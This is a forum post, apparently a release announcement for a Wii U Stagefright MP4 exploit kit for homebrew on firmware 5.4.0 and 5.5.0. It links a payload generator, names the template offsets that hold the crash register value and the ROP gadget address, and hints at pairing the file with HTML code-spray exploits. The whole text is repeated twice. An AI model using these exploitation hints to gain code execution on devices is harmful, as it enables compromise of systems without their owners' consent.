Since it was patched, there's no point in keeping this anymore. R.I.P StageFright.
- Info -
With this you can build (and in theory, run) homebrew for Wii U version 5.4.0 and 5.5.0. It is incredibly bad, and likely won't run any code for you whatsoever. Sounds good right? Yeah? Right on!
- For Developers -
We have been incredibly lazy about fixing this. However, I have a hint for you. Use the code spray code from previous HTML exploits, and embed the MP4 exploit to run code that way.
In template540 and template550, at offset 0x79 to 0x7C contains the value that is in r30 when it crashes, which is an address to a point in the ROP buffer. Essentially leave the rest of the MP4 file unchanged if you plan on doing it via HTML/JS. If you want to use another ROP gadget, then the address that is spammed at the end of the file is the gadget that we initially jump to.
- Download -
http://puu.sh/mt6LQ/45a4ab7ae8.zip (Only builds 5.5.0 payloads, edit generate_mp4.py to generate 5.4.0 payloads.)
- Credits -
zhuowei - Pointing out the bug to Marionumber1 and I.
Marionumber1 - All the fantastic ROP chain work. Plus all around masterful work. Wouldn't have been possible without him.
Mathew_Wi - Shitty initial exploitation/debugging/5.5.0 ROP Gadgets
MrRean - Helping in a way I can't quite remember.
NWPlayer123 - Something!
Hykem - I think he did something too, I can't remember, sue me.
Original Crew - comex, Relys, TheKit, and of course Mr. Chadderz himself.
- Special Thanks -
NWPlayer123 for convincing Marionumber1 to allow me to participate in the group. <3
If I forgot you, feel free to verbally abuse me on IRC or Skype.
- Info -
With this you can build (and in theory, run) homebrew for Wii U version 5.4.0 and 5.5.0. It is incredibly bad, and likely won't run any code for you whatsoever. Sounds good right? Yeah? Right on!
- For Developers -
We have been incredibly lazy about fixing this. However, I have a hint for you. Use the code spray code from previous HTML exploits, and embed the MP4 exploit to run code that way.
In template540 and template550, at offset 0x79 to 0x7C contains the value that is in r30 when it crashes, which is an address to a point in the ROP buffer. Essentially leave the rest of the MP4 file unchanged if you plan on doing it via HTML/JS. If you want to use another ROP gadget, then the address that is spammed at the end of the file is the gadget that we initially jump to.
- Download -
http://puu.sh/mt6LQ/45a4ab7ae8.zip (Only builds 5.5.0 payloads, edit generate_mp4.py to generate 5.4.0 payloads.)
- Credits -
zhuowei - Pointing out the bug to Marionumber1 and I.
Marionumber1 - All the fantastic ROP chain work. Plus all around masterful work. Wouldn't have been possible without him.
Mathew_Wi - Shitty initial exploitation/debugging/5.5.0 ROP Gadgets
MrRean - Helping in a way I can't quite remember.
NWPlayer123 - Something!
Hykem - I think he did something too, I can't remember, sue me.
Original Crew - comex, Relys, TheKit, and of course Mr. Chadderz himself.
- Special Thanks -
NWPlayer123 for convincing Marionumber1 to allow me to participate in the group. <3
If I forgot you, feel free to verbally abuse me on IRC or Skype.
Last edited by Mathew_Wi,
